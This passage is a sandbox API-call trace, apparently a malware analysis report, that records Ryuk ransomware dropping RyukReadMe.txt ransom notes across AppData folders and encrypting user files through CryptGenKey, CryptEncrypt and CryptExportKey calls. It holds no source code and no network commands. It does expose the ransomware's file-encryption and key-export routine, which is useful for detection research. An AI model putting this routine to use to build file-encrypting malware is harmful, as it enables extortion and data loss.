hTemplateFile=0x0) returned 0x190 [0141.750] GetLastError () returned 0x0 [0141.750] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.751] CloseHandle (hObject=0x190) returned 1 [0141.751] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.751] SetLastError (dwErrCode=0x0) [0141.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.751] GetLastError () returned 0xb7 [0141.751] CloseHandle (hObject=0x190) returned 1 [0141.751] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.752] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.752] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.753] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.753] SetLastError (dwErrCode=0x0) [0141.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp8_1\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.753] GetLastError () returned 0x0 [0141.753] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.754] CloseHandle (hObject=0x190) returned 1 [0141.754] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.754] SetLastError (dwErrCode=0x0) [0141.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.754] GetLastError () returned 0xb7 [0141.754] CloseHandle (hObject=0x190) returned 1 [0141.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.754] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.754] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.754] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.754] SetLastError (dwErrCode=0x0) [0141.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp9_0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.755] GetLastError () returned 0x0 [0141.755] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.756] CloseHandle (hObject=0x190) returned 1 [0141.756] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.756] SetLastError (dwErrCode=0x0) [0141.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.756] GetLastError () returned 0xb7 [0141.756] CloseHandle (hObject=0x190) returned 1 [0141.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.759] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.759] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.759] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", dwFileAttributes=0x80) returned 1 [0141.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.760] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=12201) returned 1 [0141.760] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=12201) returned 1 [0141.760] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x2e87, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.760] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.761] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.761] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.761] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.761] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.761] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2fa9, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x2fa9, lpOverlapped=0x0) returned 1 [0141.762] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.762] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x2fa9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x2fb0) returned 1 [0141.762] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.762] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x2fb0, lpOverlapped=0x0) returned 1 [0141.762] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.762] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.762] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.762] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.762] CloseHandle (hObject=0x194) returned 1 [0141.780] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.784] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.784] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.784] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.785] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", dwFileAttributes=0x80) returned 1 [0141.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.786] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=12208) returned 1 [0141.786] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=12208) returned 1 [0141.786] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x2e8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.786] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.787] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.787] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.787] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.787] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.787] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2fb0, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x2fb0, lpOverlapped=0x0) returned 1 [0141.788] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.788] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x2fb0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x2fc0) returned 1 [0141.788] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.788] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x2fc0, lpOverlapped=0x0) returned 1 [0141.788] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.788] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.788] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.788] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.789] CloseHandle (hObject=0x194) returned 1 [0141.805] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.809] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.809] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.810] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.810] SetLastError (dwErrCode=0x0) [0141.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.810] GetLastError () returned 0x0 [0141.810] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.811] CloseHandle (hObject=0x194) returned 1 [0141.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.812] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.812] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.812] SetLastError (dwErrCode=0x0) [0141.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.813] GetLastError () returned 0x0 [0141.813] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.814] CloseHandle (hObject=0x198) returned 1 [0141.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.814] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.814] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.814] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.814] SetLastError (dwErrCode=0x0) [0141.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.815] GetLastError () returned 0x0 [0141.815] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.816] CloseHandle (hObject=0x198) returned 1 [0141.816] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.816] SetLastError (dwErrCode=0x0) [0141.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.816] GetLastError () returned 0xb7 [0141.816] CloseHandle (hObject=0x198) returned 1 [0141.817] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.817] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.817] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.817] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.817] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml", dwFileAttributes=0x80) returned 1 [0141.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.817] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=13) returned 1 [0141.817] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=13) returned 1 [0141.817] CloseHandle (hObject=0x19c) returned 1 [0141.818] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.818] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.818] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.818] SetLastError (dwErrCode=0x0) [0141.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.818] GetLastError () returned 0x0 [0141.818] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.819] CloseHandle (hObject=0x198) returned 1 [0141.819] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.819] SetLastError (dwErrCode=0x0) [0141.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.819] GetLastError () returned 0xb7 [0141.819] CloseHandle (hObject=0x198) returned 1 [0141.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.819] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.819] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.820] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.820] SetLastError (dwErrCode=0x0) [0141.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.820] GetLastError () returned 0x0 [0141.820] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.821] CloseHandle (hObject=0x198) returned 1 [0141.821] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.821] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.821] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat", dwFileAttributes=0x80) returned 1 [0141.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.822] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=32768) returned 1 [0141.822] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=32768) returned 1 [0141.822] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x7ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.822] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.823] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.823] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.823] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.824] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.824] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x8000, lpOverlapped=0x0) returned 1 [0141.825] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.825] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, 